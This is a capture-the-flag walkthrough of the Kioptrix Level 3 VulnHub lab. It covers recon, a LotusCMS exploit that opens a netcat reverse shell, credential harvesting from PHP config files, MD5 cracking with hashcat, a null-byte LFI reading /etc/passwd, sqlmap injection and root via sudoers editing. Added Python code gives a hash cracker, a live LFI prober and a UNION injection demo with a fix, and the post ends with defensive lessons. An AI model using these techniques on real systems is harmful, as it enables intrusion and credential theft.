Kioptrix Level 3 without Metasploit (Vulnhub) Walkthrough

Ploy Thanasornsawan
8 min read · May 12, 2020


You can download the VM and practice from here

Step 1: Set up the Kali Linux VM and Kioptrix Level 3

On the Kali VM, network settings:
-> Tab 'Adapter 1': choose 'NAT'
-> Tab 'Adapter 2': choose 'Host-Only'

On the victim machine (Kioptrix Level 3):
-> Tab 'Adapter 1': choose 'Host-Only'

Power on both the Kali machine and the victim machine.
We use Host-Only so that both VMs sit on the same network. Now we discover the victim's IP with the command 'netdiscover -i eth1', because the host-only adapter is adapter 2 on the Kali machine and Linux names it eth1.

Step 2: Find the victim IP with netdiscover

Now we know the target IP is 192.168.56.106.

Step 3: Enumerate services on the target IP with nmap

From the nmap scan result, we see that ports 22 (SSH) and 80 (HTTP) are open.

Step 4: Information gathering on port 80 (web service) with dirb, then look up the LotusCMS exploit on Google
To enumerate all paths on the web server you can also use other tools such as gobuster, dirbuster, wfuzz, etc.

From the dirb results we see several interesting paths such as /phpmyadmin, /index.php, etc. Let's test them in the browser.

On /index.php we see a login page used by LotusCMS. I tested default credentials such as admin:admin and root:root but they did not work.

I searched for a LotusCMS exploit on Google and found a GitHub repository with a manual exploit whose author adapted the code from the Metasploit module. You can see the details and download it from https://github.com/Hood3dRob1n/LotusCMS-Exploit

Step 5: Gain access

After cloning the repository into our directory, run
./lotusRCE.sh TargetIP/

It will ask for the attacker IP and a listening port. Run nc -lvnp 5151 in another terminal tab so netcat is waiting for the connection from the target.
Attacker IP: 192.168.56.104, Listening port: 5151

After selecting option 1 (NetCat -e), you will see the connection arrive on netcat port 5151. Running id to check our privileges shows that we are the user www-data.
Let's upgrade to a tty shell: python -c 'import pty; pty.spawn("/bin/bash")'

We now see the $ prompt, but cd /root fails with permission denied, which means this is an unprivileged user.

After cd /home to look for interesting files of this user, we find two other users, dreg and loneferret. Inside loneferret's home directory we see that this user can run the editor ht via sudo, but when we try sudo ht it asks for the user's password.
We know this website uses PHP, so let's search for PHP config files that contain the word password with the command
find / -maxdepth 5 -name '*.php' -type f -exec grep -Hn password {} \; 2>/dev/null
(Quote the *.php glob so the shell does not expand it against the current directory before find sees it.)

The result shows that the MySQL password is in the file /home/www/kioptrix3.com/gallery/gconfig.php. We may not have loneferret's password yet, but if we can get into phpMyAdmin it should be possible to see all users and passwords in the database.

View the file with cat gconfig.php and find the username and password.

Try username: root, password: fuckeyou on phpMyAdmin

We know that all the config is in the gallery folder, so let's click on the gallery database.

Click on dev_accounts (this table is likely to hold usernames and passwords).

Click Browse and we see the password hashes of users dreg and loneferret.

Let's check the hash format with hash-identifier; the result says it is an MD5 hash.

Copy the password hashes from phpMyAdmin into the file hash.txt and then crack them with hashcat (-m 0 selects MD5 in hashcat, -a 0 is a straight dictionary attack):
hashcat -m 0 -a 0 ~/vulnhub/hash.txt /usr/share/wordlists/rockyou.txt

Show the cracked plaintexts in hashcat with the --show option.

Now we know that user loneferret uses the password starwars.
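Below is an added example (not from the original post and not from the LotusCMS exploit repository) of what hash-identifier and hashcat -m 0 -a 0 do under the hood: guess the algorithm from the digest's length and character set, then hash every wordlist candidate once and compare it against all target digests. The sample digests and the five-word wordlist are constructed so the script runs offline; with two arguments it reads a real hash.txt and rockyou.txt instead.

```python
import hashlib
import re
import sys

# hash-identifier keys mainly on digest length; these are the common unsalted hex digests.
HEX_DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}

# Constructed sample data so the example runs offline: the first digest is recomputed
# from the plaintext recovered in the walkthrough (starwars); the second uses a
# placeholder password, not dreg's real one.
SAMPLE_HASHES = [
    hashlib.md5(b"starwars").hexdigest(),
    hashlib.md5(b"letmein").hexdigest(),
]
SAMPLE_WORDLIST = ["password", "123456", "letmein", "starwars", "qwerty"]  # stand-in for rockyou.txt


def identify_hash(digest):
    """Return the likely algorithm for an unsalted hex digest, or None if it does not look like one."""
    d = digest.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", d):
        return None
    return HEX_DIGEST_LENGTHS.get(len(d))


def crack(digests, wordlist, algo="md5"):
    """Straight dictionary attack (hashcat -a 0): hash each candidate once, match against every target.

    Returns {digest: plaintext or None}. Candidates may be str or raw bytes; rockyou.txt
    contains lines that are not valid UTF-8, so the file reader below hands over bytes
    untouched, which is exactly what hashcat feeds to the hash function.
    """
    targets = {d.strip().lower(): None for d in digests}
    hasher = getattr(hashlib, algo)
    remaining = len(targets)
    for word in wordlist:
        raw = word.encode("utf-8") if isinstance(word, str) else word
        raw = raw.rstrip(b"\r\n")
        digest = hasher(raw).hexdigest()
        if digest in targets and targets[digest] is None:
            targets[digest] = raw.decode("utf-8", "replace")
            remaining -= 1
            if remaining == 0:
                break  # stop early once every hash is recovered
    return targets


def crack_files(hash_path, wordlist_path, algo="md5"):
    """Crack the digests in hash_path (one per line) against the words in wordlist_path."""
    with open(hash_path) as fh:
        digests = [line for line in fh if line.strip()]
    with open(wordlist_path, "rb") as wl:  # bytes on purpose, see crack()
        return crack(digests, wl, algo)


if __name__ == "__main__":
    # Usage: python crack_md5.py hash.txt /usr/share/wordlists/rockyou.txt
    if len(sys.argv) == 3:
        results = crack_files(sys.argv[1], sys.argv[2])
    else:
        results = crack(SAMPLE_HASHES, SAMPLE_WORDLIST)
    for digest, plain in results.items():
        print(f"{digest}:{plain if plain is not None else '<not cracked>'}")
```

The early exit matters on a 14-million-line wordlist: hashcat likewise stops when every hash in the target file is recovered, and its --show option replays the cracked pairs from its potfile rather than re-running the attack.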
But when we try sudo ht in the reverse shell it shows 'error opening terminal'. From the nmap result we know SSH on port 22 is open, so let's log in over SSH instead.

After logging in over SSH and trying sudo ht again, it now complains about xterm-256color; the fix is to run export TERM=xterm.

After trying sudo ht once more we get the 'File Edit Windows Help' menu.

Step 6: Escalate to root by editing the sudoers file
Press F3 to open a file and enter the path /etc/sudoers.
Because we are currently a low-privilege user, we add /bin/sh to this user's sudo entry,
so that when the user runs sudo /bin/sh the shell runs as root.

Press F2 to save and then Ctrl+C to exit.

User loneferret runs sudo /bin/sh and gets a root shell.

Vulnerabilities found in the PHP website:
- Local File Inclusion (LFI)
- SQL injection to list all databases and tables

  1. Local File Inclusion on the index file

We can list the users on the system by reading /etc/passwd through the browser: http://example.com/index.php?page=../../../etc/passwd. You can read more about this class of vulnerability in the OWASP Top 10.

from https://book.hacktricks.xyz/pentesting-web/file-inclusion

But when I tried http://192.168.56.106/index.php?page=../../../etc/passwd it did not work. I then tried the null byte (%00) trick and it returned all the users on this web server. You can put the path of any file the web server can read in place of /etc/passwd.
Caution: this technique works here because the nmap result shows the server header reports PHP 5.2.4; the null byte truncates the included path only in PHP versions before 5.3.4, where paths containing a NUL byte started being rejected.
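As an added example (not part of the original post), the probe below automates the check just described: it tries increasing ../ depths with and without a trailing %00 and flags the first response that echoes the root entry of /etc/passwd. The one detail that trips people up is encoding: the %00 must go into the URL verbatim, because running it through urlencode turns it into %2500, which PHP sees as literal text rather than a NUL byte. SAMPLE_RESPONSE is a constructed page body so the detection functions can be exercised offline; the host, parameter name (page) and user IDs are assumptions.

```python
import re
import sys
import urllib.error
import urllib.request

# Constructed stand-in for a page body returned after the %00 payload succeeded.
SAMPLE_RESPONSE = (
    "<html><body><div class='content'>\n"
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/bin/sh\n"
    "loneferret:x:1000:100::/home/loneferret:/bin/bash\n"
    "dreg:x:1001:1001::/home/dreg:/bin/bash\n"
    "</div></body></html>"
)


def lfi_payloads(target="/etc/passwd", max_depth=6):
    """Traversal strings for the include parameter, each with and without a trailing NUL.

    The %00 variant only helps on PHP < 5.3.4, which truncates the path at the NUL byte
    and so drops whatever suffix (for example ".php") the script appends to the parameter.
    """
    relative = target.lstrip("/")
    for depth in range(1, max_depth + 1):
        traversal = "../" * depth + relative
        yield traversal
        yield traversal + "%00"


def build_url(base, param, payload):
    """Append the payload verbatim: urlencode would rewrite %00 as %2500 and defeat the trick."""
    separator = "&" if "?" in base else "?"
    return f"{base}{separator}{param}={payload}"


def looks_like_passwd(body):
    """True when the root entry of /etc/passwd shows up in the response."""
    return re.search(r"^root:[^:\n]*:0:0:", body, re.M) is not None


def extract_users(body):
    """Pull the account names out of any passwd lines echoed into the page."""
    return re.findall(r"^([a-z_][a-z0-9_-]*):[^:\n]*:\d+:\d+:", body, re.M)


def probe(base, param="page", target="/etc/passwd", timeout=5):
    """Try each payload against a live host; return (url, users) for the first hit, else None."""
    for payload in lfi_payloads(target):
        url = build_url(base, param, payload)
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
        except (urllib.error.URLError, OSError):
            continue  # unreachable host or HTTP error: move on to the next payload
        if looks_like_passwd(body):
            return url, extract_users(body)
    return None


if __name__ == "__main__":
    # Usage: python lfi_probe.py http://192.168.56.106/index.php
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        print("offline demo:", extract_users(SAMPLE_RESPONSE))
```

Checking for the root entry rather than for the literal string "passwd" avoids false positives from error pages that echo the requested filename back at you.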

2. SQL injection with sqlmap to dump the usernames and passwords table

From the dirb scan result we found the path /gallery, which we can access and which has the same folder name as the config file we found. Let's navigate to 192.168.56.106/gallery/. The images do not load, and when we hover over Photo_Shoot the browser tries to resolve the hostname 'kioptrix3.com/gallery/p.php/5'.

Edit /etc/hosts with vim and add the victim IP and hostname.

Then restart the browser and open kioptrix3.com/gallery again.
Now the images on this website load.

We click through the links to find a page that might be injectable, and after clicking 'Ligoat Press Room' we see that it has sorting options.

After choosing 'Photo Id', the browser shows the SQL sort query in the page.

From this we know it is SQL-injectable. Let's save the request in Burp Suite by right-clicking and selecting 'Save to file', naming it 'sqli1'.

Edit sqli1 with vim and change the parameter from id=1 to id=1*, so sqlmap injects into that parameter when it is given this request file.

We know the database name is gallery from the browser, and when we run the table enumeration command we find dev_accounts, which should hold usernames and passwords.

Now we dump the data from the table dev_accounts in the database gallery.
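To show the bug class sqlmap just exploited, and the fix the input-validation lesson at the end of this post calls for, here is an added example (not the gallery's own PHP and not from the original post) using an in-memory SQLite database as a stand-in for the gallery schema. The photos table, the placeholder hashes in dev_accounts and the sort option names are constructed; only the table name dev_accounts and the id parameter come from the walkthrough. The vulnerable function concatenates the id and sort values into the query, so a UNION in the id parameter returns dev_accounts rows in place of photos; the safe version binds the id as a parameter and maps the sort key through an allow-list, because ORDER BY column names cannot be bound.

```python
import sqlite3

# Sort options a user may choose, mapped to real column names: the only route from user input to ORDER BY.
SORT_COLUMNS = {"photoid": "id", "title": "title", "filename": "filename"}

# A UNION that replaces the photo rows with the account table; the trailing comment swallows ORDER BY.
UNION_PAYLOAD = "1 UNION SELECT username, password FROM dev_accounts -- "


def make_db():
    """Constructed in-memory stand-in for the gallery database; the hashes are placeholders, not the real ones."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT, filename TEXT);
        CREATE TABLE dev_accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO photos VALUES (1, 'Photo_Shoot', 'shoot.jpg'), (2, 'Ligoat Press Room', 'press.jpg');
        INSERT INTO dev_accounts VALUES (1, 'dreg', 'md5-placeholder-dreg'),
                                        (2, 'loneferret', 'md5-placeholder-loneferret');
        """
    )
    return db


def vulnerable_gallery(db, photo_id, sort="id"):
    """Query built by string concatenation: both the id and the sort value land in the SQL unchanged."""
    sql = f"SELECT title, filename FROM photos WHERE id = {photo_id} ORDER BY {sort}"
    return db.execute(sql).fetchall()


def safe_gallery(db, photo_id, sort="photoid"):
    """Same query with the id bound as a parameter and the sort key taken from the allow-list."""
    if not (isinstance(photo_id, str) and photo_id.isdigit()):
        raise ValueError("id must be a positive integer")
    column = SORT_COLUMNS.get(sort)
    if column is None:  # ORDER BY cannot be parameterised, so only known column names are interpolated
        raise ValueError("unknown sort option")
    sql = f"SELECT title, filename FROM photos WHERE id = ? ORDER BY {column}"
    return db.execute(sql, (int(photo_id),)).fetchall()


def rejected(fn, *args, **kwargs):
    """True if fn refuses these inputs with ValueError (used to show the safe query rejecting payloads)."""
    try:
        fn(*args, **kwargs)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_gallery(db, UNION_PAYLOAD))
    print("safe rejects payload:", rejected(safe_gallery, db, UNION_PAYLOAD))
    print("safe, normal request:", safe_gallery(db, "1", sort="photoid"))
```

sqlmap's dump of dev_accounts is this UNION query (plus error-based and blind fallbacks) issued automatically against the id=1* position marked in the saved request.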

Lessons learned:
1. Password reuse between the sudo user and the SSH login, and passwords stored as unsalted MD5. Use different, strong passwords for each, store them with a slow salted hash such as bcrypt, scrypt or Argon2 rather than MD5, and use key-based SSH authentication instead of passwords.
2. Improper access control: a non-privileged user should not be able to edit an important file such as /etc/sudoers. Here the sudo rule let loneferret run the editor ht as root, and an editor running as root can open and save any file, so do not grant sudo on general-purpose editors and edit sudoers only through visudo. Note that the sticky bit (chmod +t) is not a fix: on a regular file Linux ignores it, and on a directory it only stops users other than the owner from deleting or renaming entries.

(see https://www.thegeekstuff.com/2013/02/sticky-bit/ for what the sticky bit actually does)

3. The backend should validate input instead of using URL parameters directly: an allow-list of page names for the include, and parameterised queries for the database, would prevent the Local File Inclusion (LFI) and SQL injection found here.

4. phpMyAdmin is exposed to the network and accepts the database root credentials that are stored in plaintext in gconfig.php, so anyone who can read that file can run arbitrary queries. phpMyAdmin should not be reachable from untrusted networks, and the web application should connect with a low-privilege database account rather than root.
